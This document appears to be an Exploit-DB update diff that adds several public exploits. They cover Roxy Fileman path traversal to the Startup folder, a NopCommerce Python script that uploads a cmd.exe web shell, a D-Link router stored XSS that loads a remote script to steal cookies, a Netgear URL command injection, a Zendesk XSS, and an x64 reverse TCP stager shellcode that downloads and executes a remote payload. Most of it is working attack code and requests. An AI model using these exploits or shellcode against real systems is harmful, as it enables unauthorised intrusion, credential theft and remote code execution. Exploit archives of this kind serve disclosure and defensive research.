DB: 2019-12-18

7 changes to exploits/shellcodes

D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting
Roxy Fileman 1.4.5 - Directory Traversal
Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting
Netgear R6400 - Remote Code Execution
NopCommerce 4.2.0 -  Privilege Escalation

Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)

exploits/aspx/webapps/47777.txt

@@ -0,0 +1,125 @@
+# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal
+# Author: Patrik Lantz
+# Date: 2019-12-06
+# Software: Roxy Fileman
+# Version: 1.4.5
+# Vendor Homepage: http://www.roxyfileman.com/
+# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
+# CVE: N/A
+
+Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134 
+(using custom account as application pool identity for the IIS worker process).
+
+
+===========================
+Description
+===========================
+Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on 
+the IIS worker process privileges. 
+This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution
+of this file will be triggered on the next login.
+
+
+Proof of Concept
+===========================
+
+It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action.
+The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location.
+Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case
+allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include 
+the .lnk extension.
+
+1) Create a shortcut file
+
+By using for example the target executable C:\Windows\System32\Calc.exe
+Remove the .lnk extension and rename it to use the .dat extension.
+
+
+2) Upload the file 
+
+Either upload the .dat file manually via the Roxy Fileman web interface
+or programmatically using a HTTP POST request. 
+
+Details of the request:
+
+POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1
+Host: 127.0.0.1:50357
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------159382831523528
+Content-Length: 924
+Origin: http://127.0.0.1:50357
+Connection: close
+Referer: http://127.0.0.1:50357/wwwroot/fileman/
+Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
+
+-----------------------------159382831523528
+Content-Disposition: form-data; name="action"
+
+upload
+-----------------------------159382831523528
+Content-Disposition: form-data; name="method"
+
+ajax
+-----------------------------159382831523528
+Content-Disposition: form-data; name="d"
+
+/wwwroot/fileman/Uploads/test2
+-----------------------------159382831523528
+Content-Disposition: form-data; name="files[]"; filename="poc.dat"
+Content-Type: application/octet-stream
+
+...data omitted...
+-----------------------------159382831523528--
+
+
+
+3) Write the file to the Startup folder using the RENAMEFILE action
+The new filename is set via the n parameter. The correct path can be identified by trial and error depending 
+on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe).
+
+If the necessary directories do not exist, they can be created using the CREATEDIR action which also
+is vulnerable to path traversal.
+
+
+POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1
+Host: 127.0.0.1:50357
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 66
+Origin: http://127.0.0.1:50357
+Connection: close
+Referer: http://127.0.0.1:50357/wwwroot/fileman/
+Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
+
+f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat
+
+
+
+Workaround / Fix:
+===========================
+
+Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions: 
+CREATEDIR, COPYFILE and RENAMEFILE.
+
+Recommendations for users of Roxy Fileman:
+  - Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default.
+
+
+
+Timeline
+===========================
+2019-12-06: Discovered the vulnerability
+2019-12-06: Reported to the vendor (vendor is unresponsive)
+2019-12-11: Request CVE
+2019-12-13: Advisory published
+
+Discovered By:
+===========================
+Patrik Lantz

exploits/aspx/webapps/47783.py

@@ -0,0 +1,79 @@
+# Vulnerability Title: NopCommerce 4.2.0 -  Privilege Escalation
+# Author: Alessandro Magnosi (d3adc0de)
+# Date: 2019-07-07
+# Vendor Homepage: https://www.nopcommerce.com/
+# Software Link : https://www.nopcommerce.com/
+# Tested Version: 4.2.0
+# Vulnerability Type: Privilege Escalation
+# Tested on OS: Windows 10, CentOS, Docker
+# Exploit designed for: NopCommerce 4.2.0 on IIS
+
+import requests
+import argparse
+from bs4 import BeautifulSoup
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import warnings
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+def proxy(flag):
+    return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None
+
+def geturl(baseurl, type):
+    if type == "login":
+        return baseurl + "/login"
+    elif type == "mv":
+        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2"
+    elif type == "mkdir":	
+        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common"
+    elif type == "put":	
+        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD"
+    elif type == "contactus":    
+        return baseurl + "/contactus"
+    else:
+        return ""
+
+def login(email, password, url, proxy):
+    res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False)
+    cookie = res.cookies.get_dict()
+    soup = BeautifulSoup(res.text, features="html.parser")
+    token = soup.find("input", {"name":"__RequestVerificationToken"})["value"]
+    res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False)
+    cookies = res.cookies.get_dict()
+    return { **cookies, **cookie }
+
+def shellupload(email, password, url, proxy):
+    print("[+] Trying uploading shell from")	
+    cookies = login(email, password, url, proxy)
+    # Rename Common Directory
+    requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
+    # Create Common Directory
+    requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
+    # Upload File into Common
+    requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n    ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n    var result = \"\";\r\n    var cmd = Context.Request.Query[\"cmd\"];\r\n    if (!String.IsNullOrEmpty(cmd)){\r\n        result = Bash(cmd);\r\n    }\r\n\r\n    if (String.IsNullOrEmpty(result)){\r\n        result = \"Invalid command or something didn't work\";\r\n    }\r\n\r\n}\r\n\r\n@functions{\r\n    public static string Bash (string cmd)\r\n    {\r\n        var result = \"\";\r\n        var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n        var process = new Process()\r\n        {\r\n            StartInfo = new ProcessStartInfo\r\n            {\r\n                FileName = \"cmd.exe\",\r\n                Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n                RedirectStandardOutput = true,\r\n                UseShellExecute = false,\r\n                CreateNoWindow = true,\r\n            }\r\n        };\r\n\r\n        process.Start();\r\n        result = process.StandardOutput.ReadToEnd();\r\n        process.WaitForExit();\r\n\r\n        return result;\r\n    }\r\n}\r\n\r\n\r\n\r\n<script\r\n  src=\"https://code.jquery.com/jquery-3.2.1.min.js\"\r\n  integrity=\"sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=\"\r\n  crossorigin=\"anonymous\"></script>\r\n<script>\r\n$(function() {\r\n    var cmdResult = $(\"#cmdResult\");\r\n\r\n\tconsole.log(cmdResult);\r\n\r\n\tif (cmdResult.text() === \"Invalid command or something didn't work\"){\r\n\t    console.log(\"should change text\");\r\n        cmdResult.css(\"color\", \"red\");\r\n\t}\r\n\t\r\n\tvar term = $(\"#console\");\r\n    $(\"#cmd\").focus();\r\n\tterm.scrollTop(term.prop(\"scrollHeight\"));\r\n\t\r\n\t$.urlParam = function(name){\r\n        var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(window.location.href);\r\n        if (results==null){\r\n           return null;\r\n        }\r\n        else{\r\n           return decodeURI(results[1]) || 0;\r\n        }\r\n    }\r\n\r\n\t\r\n\tfunction executeCmd(){\r\n        var cmd = encodeURIComponent($(\"#cmd\").val());\r\n\t    var currentCmd = $.urlParam('cmd');\r\n\t    console.log(\"should replace: \" + currentCmd + \" WITH: \" + cmd);\r\n\r\n\t    var currentUrl = location.href;\r\n\r\n\t    var paramDelimeter = \"\";\r\n\t    if (currentUrl.indexOf(\"?\") < 0){\r\n\t        paramDelimeter = \"?\";\r\n\t    } else {\r\n\t        paramDelimeter = \"&\";\r\n\t    }\r\n        \r\n\t    if (currentUrl.indexOf(\"cmd=\") < 0){\r\n            currentUrl = location.href + paramDelimeter + \"cmd=\";\r\n\t    }\r\n\t\r\n        var newUrl = currentUrl.replace(/cmd=.*/, \"cmd=\"+cmd);\r\n        window.location.href = newUrl;\r\n\r\n\t    //console.log(newUrl);\r\n\t}\r\n\t\r\n    $(\"#submitCommand\").click(function(){\r\n\t    executeCmd();\r\n\t})\r\n\r\n\t$(\"#cmd\").keypress(function (e) {\r\n\t    if (e.which == 13) {\r\n\t        executeCmd();\r\n\t        return false;\r\n\t    }\r\n\t});\r\n\r\n\t$(\"#cmd\").on(\"change paste keyup\", function(theVal){\r\n\t    var cmd = $(\"#cmd\").val();\r\n\t    $(\"#cmdInput\").text(cmd);\r\n\t});\r\n});\r\n\r\n</script>\r\n\r\n\r\n<h3>@ViewData[\"Title\"].</h3>\r\n<h4>@ViewData[\"Message\"]</h4>\r\n<h4>Output for:> <span style=\"font-family: monospace; font-weight: normal;\">@cmd</span></h4>\r\n\r\n\r\n<pre id=\"console\" style=\"color: #00ff00;background-color: #141414;max-height: 606px;\">\r\nC#:>@cmd\r\n\t\r\n<span id=\"cmdResult\">@result</span>\r\n\t\r\nC#:><span id=\"cmdInput\"></span>\r\n</pre>\r\n\r\n<br />\r\n\r\n<p>Enter your command below:</p>\r\n<span style=\"display: inline-flex !important;\">\r\n    <input  id=\"cmd\" class=\"form-control\" type=\"text\" style=\"width: 400px;\" /> \r\n\t<button id=\"submitCommand\" class=\"btn btn-primary\">Send!</button>\r\n</span>\r\n\r\n-----------------------------3125261928760--", proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
+    # Test if it is working
+    res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
+    soup = BeautifulSoup(res.text, features="html.parser")
+    test = soup.find("span", {"id" : "cmdResult"})
+    if test is None:
+        print("[-] Maybe the target is not vulnerable, or you need to restart the appliance")
+    else:
+        print("[+] Shell uploaded under contact us page")
+
+def main():
+    parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce')
+    parser.add_argument(
+        '-e', '--email', required=True, type=str, help='Username')
+    parser.add_argument(
+        '-p', '--password', required=True, type=str, help='Password')
+    parser.add_argument(
+        '-u', '--url', required=True, type=str, help='Base Url of NopCommerce')
+    parser.add_argument(
+        '-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)')
+
+    args = parser.parse_args()
+
+    shellupload(args.email, args.password, args.url, proxy(args.proxy))
+
+if __name__ == '__main__':
+    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+    main()

exploits/hardware/webapps/47776.txt

@@ -0,0 +1,37 @@
+# Exploit Title: D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting
+# Date: 2019-12-13
+# Exploit Author: Sanyam Chawla
+# Vendor Homepage: http://www.dlink.co.in
+# Category: Hardware (Wi-fi Router)
+# Hardware Link: http://www.dlink.co.in/products/?pid=678
+# Hardware Version: T1
+# Firmware Version: 20.07
+# Tested on: Windows 10 and Kali linux
+# CVE: N/A
+
+Reproduction Steps:
+1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
+2. Go to Maintenance page and click on Admin on the left panel
+3. Put blind xss Payload in to the name field “><script src=https://ptguy.xss.ht></script>. This payload saved by the server and its reflected in the user page.
+4. Every refresh in the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
+5. For HTML injection just put <b> Testing </b> in username field, you will get the username bold in your homepage.
+
+#Burp Intercept
+
+POST /form2userconfig.cgi HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
+Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 180
+Origin: http://192.168.0.1
+Connection: close
+Referer: http://192.168.0.1/userconfig.htm
+Cookie: SessionID=
+Upgrade-Insecure-Requests: 1
+
+username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht
+<http://2Fptguy.xss.ht>%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

exploits/hardware/webapps/47778.txt

@@ -7,7 +7,7 @@
 # Hardware Version: T1
 # Firmware Version: 20.07
 # Tested on: Windows 10 and Kali linux
-# CVE: N/A
+# CVE: CVE-2019-19743
 
 # Reproduction Steps:
 # Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]

exploits/hardware/webapps/47782.py

@@ -0,0 +1,27 @@
+# Exploit Title: Netgear R6400 - Remote Code Execution
+# Date: 2019-12-14
+# Exploit Author: Kevin Randall
+# CVE: CVE-2016-6277
+# Vendor Homepage: https://www.netgear.com/
+# Category: Hardware
+# Version: V1.0.7.2_1.1.93
+
+# PoC
+
+#!/usr/bin/python
+
+import urllib2
+
+IP_ADDR = "192.168.1.1"
+PROTOCOL = "http://"
+DIRECTORY = "/cgi-bin/;"
+CMD = "date"
+FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD
+
+req = urllib2.Request(url = FULL_URL)
+response = urllib2.urlopen(req)
+commandoutput = response.read()
+spl_word =  "}"
+formattedoutput = commandoutput
+result = formattedoutput.rpartition(spl_word)[2]
+print result

exploits/java/webapps/47781.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting
+# Date: 2019-12-17
+# Exploit Author: MTK
+# Vendor Homepage: https://sweethawk.co/zendesk/survey-app
+# Software Link: https://www.zendesk.com/apps/support/survey/
+# Version: Up to v1.6
+# Tested on: Zendesk - Firefox/Windows
+
+# Software description:
+# Sweet Hawk Survey app ask customers for a 0-10 score instead of the normal good or bad question. 
+# You can get more granular satisfaction data without compromising the response rate. 
+# Ask an optional NPS question on the landing page. View reports and drill down into the response 
+# detail and go directly to the ticket. Easy to set up, just replace the survey place holder in 
+# your trigger or automation. Customize the landing pages for each of your brands.
+
+# Technical Details & Impact:
+# Attackers use vulnerable web pages to inject malicious code and have it stored on the web server 
+# for later use. The payload is automatically served to users who browse web pages and executed in 
+# their context. Thus, the victims do not need to click on a malicious link to run the payload. 
+# All they have to do is visit a vulnerable web page.
+
+# POC
+
+1. Open Support ticket in Zendesk and send XSS payload e.g;
+<script>alert(1);</script>
+2. Generate survey  request to rate the ticket and payload will execute;
+
+# Time line
+09-19-2019 - Vulnerability discovered
+09-20-2019 - Vendor contacted
+12-02-2019 - Detailed report shared and full disclosure time line given with no response
+12-17-2019 - Full Disclosure

files_exploits.csv

@@ -42087,4 +42087,9 @@ id,file,description,date,author,type,platform,port
 47772,exploits/php/webapps/47772.rb,"OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)",2019-12-12,"Onur ER",webapps,php,
 47773,exploits/php/webapps/47773.txt,"Bullwark Momentum Series JAWS 1.0 - Directory Traversal",2019-12-12,"numan türle",webapps,php,
 47774,exploits/hardware/webapps/47774.txt,"NVMS 1000 - Directory Traversal",2019-12-13,"numan türle",webapps,hardware,
+47776,exploits/hardware/webapps/47776.txt,"D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting",2019-12-16,"Sanyam Chawla",webapps,hardware,
+47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,
 47778,exploits/hardware/webapps/47778.txt,"D-Link DIR-615 - Privilege Escalation",2019-12-16,"Sanyam Chawla",webapps,hardware,
+47781,exploits/java/webapps/47781.txt,"Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting",2019-12-17,MTK,webapps,java,
+47782,exploits/hardware/webapps/47782.py,"Netgear R6400 - Remote Code Execution",2019-12-17,"Kevin Randall",webapps,hardware,
+47783,exploits/aspx/webapps/47783.py,"NopCommerce 4.2.0 -  Privilege Escalation",2019-12-17,"Alessandro Magnosi",webapps,aspx,

files_shellcodes.csv

@@ -1009,3 +1009,4 @@ id,file,description,date,author,type,platform
 47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux
 47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux
 47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux
+47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64

shellcodes/linux_x86-64/47784.txt

@@ -0,0 +1,163 @@
+;# Title: Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)
+;# Date: 2019-12-16
+;# Author: Lee Mazzoleni
+;# Tested on: Ubuntu 18.04.2 LTS
+; reverse tcp stager - download and execute up to 4096 bytes of additional payload - no null bytes in this
+; this code is 188 bytes total (less if you delete the exit() syscall at the end)
+
+global _start
+
+section .text
+_start:
+
+        ;// =================>
+        ;// HEAP ALLOCATION =>
+        ;// =================>
+        xor rax, rax
+        mov al, 6
+        mov cl, 2
+        imul ax, cx                     ;// int brk()
+        xor rdi, rdi
+        syscall                         ;// brk()
+        xor rax, rax
+        mov al, 2
+        mov cl, 6
+        imul ax, cx
+        xor rdi, rdi
+        mov dil, 128
+        imul di, 32
+        syscall                         ;// brk(0x1000) - 4096 bytes
+        xchg rcx, rax                   ;// save addr of our allocated memory in rcx
+
+        ;//=======================>
+        ;// MAP HEAP PERMISSIONS =>
+        ;//=======================>
+        xor rax, rax
+        mov al, 9
+        xchg rdi, rcx
+        xor rsi, rsi
+        mov sil, 128
+        imul si, 32
+        xor rdx, rdx
+        mov dl, 0x7
+        xor r10, r10
+        mov r10b, 0x21
+        xor r9, r9
+        mov r8, -1
+        syscall                         ;// mmap(addr, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0)
+        mov r9, rax                     ;// save heap address in r9
+
+        ;// ===================>
+        ;// SOCKET CONNECTION =>
+        ;// ===================>
+        xor rax, rax
+        mov al, 41                      ;// int socket()
+        xor rdi, rdi
+        inc rdi
+        inc rdi                         ;// AF_INET
+        xor rsi, rsi
+        inc rsi                         ;// SOCK_STREAM
+        xor rdx, rdx
+        mov dl, 6                       ;// IPPROTO_TCP
+        syscall                         ;// socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
+        push rax
+        pop rdi                         ;// save the socket's fd in rdi for connect() to use
+
+        xor rax, rax
+        push rax
+        mov dword [rsp-4], 0x2a37a8c0   ;// 192.168.55.42
+        mov word [rsp-6], 0xbb01        ;// port 443 in lil' endian
+        sub rsp, 6
+        push word 0x2
+
+        xor rax, rax
+        mov al, 42                      ;// int connect()
+        mov rsi, rsp
+        xor rdx, rdx
+        mov dl, 16
+        syscall                         ;// connect(3, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("192.168.55.42")}, 16)
+
+        ;// ====================================>
+        ;// READ CODE FROM SOCKET FD INTO HEAP =>
+        ;// ====================================>
+        mov rsi, r9                     ;// heap addr still saved in r9
+        xor rdx, rdx
+        mov dl, 41                      ;// CHANGE THIS NUMBER TO SUIT THE SIZE OF YOUR PAYLOAD (41-byte payload used in testing)
+        xor rax, rax
+        syscall                         ;// read(3, heap_addr, SIZE)
+
+        ;// =================>
+        ;// CLOSE SOCKET FD =>
+        ;// =================>
+        xor rax, rax
+        mov al, 3
+        syscall                         ;// close(3)
+
+        jmp r9                          ;// jmp to the heap address in r9 and execute the downloaded payload
+
+        ;// =========>
+        ;// EXIT(0) => this bit is unnecessary if your payload already calls exit()
+        ;// =========>
+        xor rax, rax
+        mov al, 60
+        xor rdi, rdi
+        syscall
+
+
+; ===============>
+; ===== Usage ===>
+; ===============>
+; =========================================================================================
+; this program downloads a secondary payload from a remote host, and executes it.
+; in this example, the payload used will be a simple hello-world-like program (hello.asm):
+; =========================================================================================
+; global _start
+; section .text
+; _start:
+;	mov rax, 1
+;	mov rdi, 1
+;	mov rsi, 0x0a21216f6c6c6548	; "Hello!!\n"
+;	push rsi
+;	mov rsi, rsp
+;	mov rdx, 8
+;	syscall
+;	mov rax, 60
+;	xor rdi, rdi
+;	syscall
+; =========================================================================================
+; 1.) compile your payload:
+; -----------------------------------------------------------------------------------------
+; nasm -f elf64 hello.asm -o hello.o && ld hello.o -o hello && rm hello.o
+; =========================================================================================
+; 2.) retrieve the opcodes for the payload:
+; -----------------------------------------------------------------------------------------
+; objdump -d hello|grep -v '^$\|start>\|file format\|Disassembly'|cut -d' ' -f2-9|sed -E "s/\ [0-9a-f]{6}://g"|grep -Eo '[a-f0-9]{2}'|tr -d '\n' ; echo
+; b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05
+; =========================================================================================
+; 3.) count how many bytes are in your payload (41 bytes) and update line 86 to reflect this:
+; -----------------------------------------------------------------------------------------
+; echo b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05|grep -Eo '[a-f0-9]{2}'|wc -l
+; 41
+; =========================================================================================
+; 4.) decode the bytes into raw form and serve it via netcat listener:
+; -----------------------------------------------------------------------------------------
+; echo -n b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05 | xxd -r -p > payload
+; nc -lvp 443 < payload
+; listening on [any] 443 ...
+; =========================================================================================
+; 5.) one last step before compiling this stager, add your own IP address to line 69:
+; -----------------------------------------------------------------------------------------
+; import struct, socket
+; print(hex(struct.unpack('<L', socket.inet_aton('192.168.55.42'))[0]))
+; 0x2a37a8c0
+; =========================================================================================
+; 6.) compile and run this shellcode - it will connect to your netcat listener, download & exec the raw payload
+; -----------------------------------------------------------------------------------------
+; nasm -f elf64 stager.asm -o stager.o && ld stager.o -o stager && rm stager.o
+; ./stager
+;  Hello!!
+; =========================================================================================
+
+
+; Raw paste:
+; 4831c0b006b102660fafc14831ff0f054831c0b002b106660fafc14831ff40b780666bff200f0548914831c0b0094887f94831f640b680666bf6204831d2b2074d31d241b2214d31c949c7c0ffffffff0f054989c14831c0b0294831ff48ffc748ffc74831f648ffc64831d2b2060f05505f4831c050c74424fcc0a8372a66c74424fa01bb4883ec06666a024831c0b02a4889e64831d2b2100f054c89ce4831d2b2294831c00f054831c0b0030f0541ffe14831c0b03c4831ff0f05